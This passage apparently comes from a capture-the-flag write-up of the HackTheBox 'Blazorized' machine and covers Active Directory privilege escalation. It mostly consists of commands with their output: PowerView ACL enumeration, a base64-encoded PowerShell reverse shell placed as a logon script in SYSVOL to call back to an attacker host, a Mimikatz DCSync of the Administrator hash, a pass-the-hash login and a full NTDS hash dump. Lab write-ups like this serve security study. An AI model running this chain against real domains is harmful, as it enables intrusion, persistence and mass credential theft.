We don't get far by using just the imported BloodHound data, however this hints at some other configuration within the Active Directory environment we might be able to abuse.
We continue with using PowerView with the compromised user to get an insight about all the ACL's they have access to.
*Evil-WinRM* PS C:\ProgramData\xpltive> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\ProgramData\xpltive> $rsa_4810_sid = Convert-NameToSid rsa_4810
*Evil-WinRM* PS C:\ProgramData\xpltive> Get-DomainObjectAcl -Identity * -ResolveGUIDs | ? {$_.SecurityIdentifier -eq $rsa_4810_sid}
AceType : AccessAllowed
ObjectDN : CN=NU_1055,CN=Users,DC=blazorized,DC=htb
ActiveDirectoryRights : ReadProperty, GenericExecute
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611-1117
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-1107
AccessMask : 131092
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceQualifier : AccessAllowed
ObjectDN : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
ActiveDirectoryRights : WriteProperty
ObjectAceType : Script-Path
ObjectSID : S-1-5-21-2039403211-964143010-2924010611-1124
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-1107
AccessMask : 32
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
AceType : AccessAllowed
ObjectDN : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
ActiveDirectoryRights : ReadProperty, GenericExecute
OpaqueLength : 0
ObjectSID : S-1-5-21-2039403211-964143010-2924010611-1124
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-1107
AccessMask : 131092
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
We have the WriteProperty rights on the Script-Path of domain user SSA_6010. With this we can write a custom script that executes upon logon of the SSA_6010 user.
The logon scripts are usually stored at \\DOMAIN\SYSVOL\DOMAIN\scripts\.... We need to be able to write to the folder as the rsa_4810 domain user or any other user we have compromised. To check the access rights to it we can run a quick check with icalcs.
*Evil-WinRM* PS C:\ProgramData\xpltive> icacls \\blazorized.htb\sysvol\blazorized.htb\scripts\
\\blazorized.htb\sysvol\blazorized.htb\scripts\ CREATOR OWNER:(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BLAZORIZED\RSA_4810:(RX)
BLAZORIZED\Administrator:(RX)
BUILTIN\Administrators:(RX,W,WDAC,WO)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\ProgramData\xpltive> icacls \\blazorized.htb\sysvol\blazorized.htb\scripts\*
\\blazorized.htb\sysvol\blazorized.htb\scripts\11DBDAEB100D BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(I)(OI)(CI)(RX)
\\blazorized.htb\sysvol\blazorized.htb\scripts\A2BFDCF13BB2 BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(I)(OI)(CI)(RX)
\\blazorized.htb\sysvol\blazorized.htb\scripts\A32FF3AEAA23 BLAZORIZED\RSA_4810:(OI)(CI)(F)
BLAZORIZED\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(I)(OI)(CI)(RX)
\\blazorized.htb\sysvol\blazorized.htb\scripts\CADFDDCE0BAD BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(I)(OI)(CI)(RX)
\\blazorized.htb\sysvol\blazorized.htb\scripts\CAFE30DAABCB BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Server Operators:(I)(OI)(CI)(RX)
Successfully processed 5 files; Failed processing 0 files
We have full access to the A32FF3AEAA23 folder. With this information we will plan the attack to create a malicious .bat file executing a PowerShell command serving to establish a reverse shell connection and put it into this directory. Finally we will modify the script path for the ssa_6010 user in order for them to run the malicious .bat file upon logging in and establishing a connection to our attack host.
Starting with creating the malicious .bat. We will once again use base64 encoded PowerShell command of revshells and just save it as a .bat file.
$ echo 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMwAzACIALAA2ADYANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' > shelly.bat
Following this we upload it to the victim host using the WinRM upload functionality. Then copy it to the target path \\blazorized.htb\sysvol\blazorized.htb\scripts\A32FF3AEAA23 that we discovered we have full access to.
*Evil-WinRM* PS C:\Programdata\xpltive> upload ./tools/shelly.bat
Info: Uploading /home/kali/htb/blazorized/tools/shelly.bat to C:\Programdata\xpltive\shelly.bat
Data: 1848 bytes of 1848 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Programdata\xpltive> cp shelly.bat \\blazorized.htb\sysvol\blazorized.htb\scripts\A32FF3AEAA23\shelly.bat
Finally we start our listener to catch the connection attempt and set the script path for the target domain user ssa_6010 using Set-DomainObject of PowerView.
*Evil-WinRM* PS C:\Programdata\xpltive> Set-DomainObject SSA_6010 -Set @{'scriptPath'='A32FF3AEAA23\shelly.bat'} -Verbose
*Evil-WinRM* PS C:\Programdata\xpltive> Get-DomainObject -Identity SSA_6010
logoncount : 3410
badpasswordtime : 6/19/2024 9:58:18 AM
distinguishedname : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
objectclass : {top, person, organizationalPerson, user}
displayname : SSA_6010
lastlogontimestamp : 1/17/2025 3:16:08 PM
userprincipalname : SSA_6010@blazorized.htb
name : SSA_6010
objectsid : S-1-5-21-2039403211-964143010-2924010611-1124
samaccountname : SSA_6010
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 1/18/2025 2:03:12 AM
instancetype : 4
usncreated : 29007
objectguid : 8bf3166b-e716-4f91-946c-174e1fb433ed
lastlogoff : 12/31/1600 6:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=blazorized,DC=htb
dscorepropagationdata : {6/19/2024 1:24:50 PM, 6/14/2024 12:40:41 PM, 6/14/2024 12:40:28 PM, 6/14/2024 12:38:20 PM...}
memberof : {CN=Super_Support_Administrators,CN=Users,DC=blazorized,DC=htb, CN=Remote Management Users,CN=Builtin,DC=blazorized,DC=htb}
lastlogon : 1/17/2025 8:03:10 PM
cn : SSA_6010
badpwdcount : 0
scriptpath : A32FF3AEAA23\shelly.bat
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 1/10/2024 2:32:00 PM
primarygroupid : 513
pwdlastset : 2/25/2024 11:56:55 AM
usnchanged : 357071
And after some time we will catch the shell on our listener as ssa_6010 on the DC1 host.
$ rlwrap -cAr nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.16.33] from (UNKNOWN) [10.129.231.74] 52427
PS C:\Windows\system32> whoami
blazorized\ssa_6010
PS C:\Windows\system32> hostname
DC1
Domain Compromise¶
From our previous BloodHound data we see that the SUPER_SUPPORT_ADMINISTRATORS group, the now compromised user ssa_6010 is member of, has DCSync rights on the blazorized.htb domain.
We leverage this to obtain the NTLM hash of the domain administrator using Mimikatz. We transfer the tool over and perform the DCSync attack; targeting the domain administrator.
PS C:\ProgramData\xpltive> .\mimikatz.exe "lsadump::dcsync /user:Administrator /domain:blazorized.htb" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:Administrator /domain:blazorized.htb
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/25/2024 11:54:43 AM
Object Security ID : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID : 500
Credentials:
Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
<--SNIP-->
We proceed with a pass-the-hash attack and dump the NTDS domain database using Netexec.
$ nxc smb dc1.blazorized.htb -u Administrator -H f55ed1465179ba374ec1cad05b34a5f3
SMB 10.129.231.74 445 DC1 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.74 445 DC1 [+] blazorized.htb\Administrator:f55ed1465179ba374ec1cad05b34a5f3 (Pwn3d!)
┌──(kali㉿kali)-[~/htb/blazorized]
└─$ nxc smb dc1.blazorized.htb -u Administrator -H f55ed1465179ba374ec1cad05b34a5f3 --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n]
SMB 10.129.231.74 445 DC1 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.74 445 DC1 [+] blazorized.htb\Administrator:f55ed1465179ba374ec1cad05b34a5f3 (Pwn3d!)
SMB 10.129.231.74 445 DC1 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.231.74 445 DC1 Administrator:500:aad3b435b51404eeaad3b435b51404ee:f55ed1465179ba374ec1cad05b34a5f3:::
SMB 10.129.231.74 445 DC1 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.231.74 445 DC1 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a001ebf25825cadb6b423a2d28378467:::
SMB 10.129.231.74 445 DC1 blazorized.htb\RSA_4810:1107:aad3b435b51404eeaad3b435b51404ee:381b793bde4dea233ae34bb1d9ce38f5:::
SMB 10.129.231.74 445 DC1 blazorized.htb\NU_1056:1109:aad3b435b51404eeaad3b435b51404ee:abe496a00e60878932c084c9db511f94:::
SMB 10.129.231.74 445 DC1 blazorized.htb\NU_1057:1110:aad3b435b51404eeaad3b435b51404ee:59e98e58c973a5cb2b125a17ff91b6a8:::
SMB 10.129.231.74 445 DC1 blazorized.htb\NU_1058:1111:aad3b435b51404eeaad3b435b51404ee:6ac2dfc65463962ed19b653b409046ba:::
SMB 10.129.231.74 445 DC1 blazorized.htb\NU_1055:1117:aad3b435b51404eeaad3b435b51404ee:63001e8b2d13ee358ad7d6de4590fed3:::
SMB 10.129.231.74 445 DC1 blazorized.htb\RSA_4811:1118:aad3b435b51404eeaad3b435b51404ee:4368391035803bf58273e1273692285b:::
SMB 10.129.231.74 445 DC1 blazorized.htb\RSA_4812:1120:aad3b435b51404eeaad3b435b51404ee:c66e4531c81de604e3531018fdad81cb:::
SMB 10.129.231.74 445 DC1 blazorized.htb\RSA_4813:1121:aad3b435b51404eeaad3b435b51404ee:2c84dfeb21e075dc5fc2c56447bdf9d6:::
SMB 10.129.231.74 445 DC1 blazorized.htb\RSA_4814:1122:aad3b435b51404eeaad3b435b51404ee:e7ddd56fabdb8fb1ebe6c43ff5fe815a:::
SMB 10.129.231.74 445 DC1 blazorized.htb\SSA_6010:1124:aad3b435b51404eeaad3b435b51404ee:798d0354e026fd168b91063f09184c9f:::
SMB 10.129.231.74 445 DC1 blazorized.htb\SSA_6011:1125:aad3b435b51404eeaad3b435b51404ee:be1ce1381c084dc4cda8159a665b3c59:::
SMB 10.129.231.74 445 DC1 blazorized.htb\SSA_6012:1126:aad3b435b51404eeaad3b435b51404ee:08db7bd0f2482f4e4cb0b1f6864f88e1:::
SMB 10.129.231.74 445 DC1 blazorized.htb\SSA_6013:1127:aad3b435b51404eeaad3b435b51404ee:ef37b4e655b62e664b6f9ae67133f2e6:::
SMB 10.129.231.74 445 DC1 blazorized.htb\LSA_3211:1128:aad3b435b51404eeaad3b435b51404ee:7c8fed15e80ed63db789ad740cda2f18:::
SMB 10.129.231.74 445 DC1 blazorized.htb\LSA_3212:1129:aad3b435b51404eeaad3b435b51404ee:72bab07816477b4aeffca4f709efbaa5:::
SMB 10.129.231.74 445 DC1 blazorized.htb\LSA_3213:1131:aad3b435b51404eeaad3b435b51404ee:e80b666e0ee68cd0a6516a92e75231cc:::
SMB 10.129.231.74 445 DC1 DC1$:1002:aad3b435b51404eeaad3b435b51404ee:4b4ed5dfaa22dc4e41c279c0c62b9ee2:::
SMB 10.129.231.74 445 DC1 [+] Dumped 20 NTDS hashes to /home/kali/.nxc/logs/DC1_10.129.231.74_2025-01-18_031048.ntds of which 19 were added to the database
SMB 10.129.231.74 445 DC1 [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.129.231.74 445 DC1 [*] cat /home/kali/.nxc/logs/DC1_10.129.231.74_2025-01-18_031048.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.129.231.74 445 DC1 [*] grep -iv disabled /home/kali/.nxc/logs/DC1_10.129.231.74_2025-01-18_031048.ntds | cut -d ':' -f1
The root flag can now be obtained at C:\Users\Administrator\Desktop\root.txt.
$ nxc smb dc1.blazorized.htb -u Administrator -H f55ed1465179ba374ec1cad05b34a5f3 -x "type C:\Users\Administrator\Desktop\root.txt"
SMB 10.129.231.74 445 DC1 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC1) (domain:blazorized.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.74 445 DC1 [+] blazorized.htb\Administrator:f55ed1465179ba374ec1cad05b34a5f3 (Pwn3d!)
SMB 10.129.231.74 445 DC1 [+] Executed command via wmiexec
SMB 10.129.231.74 445 DC1 48b522165eef12c73c34205c205de8ac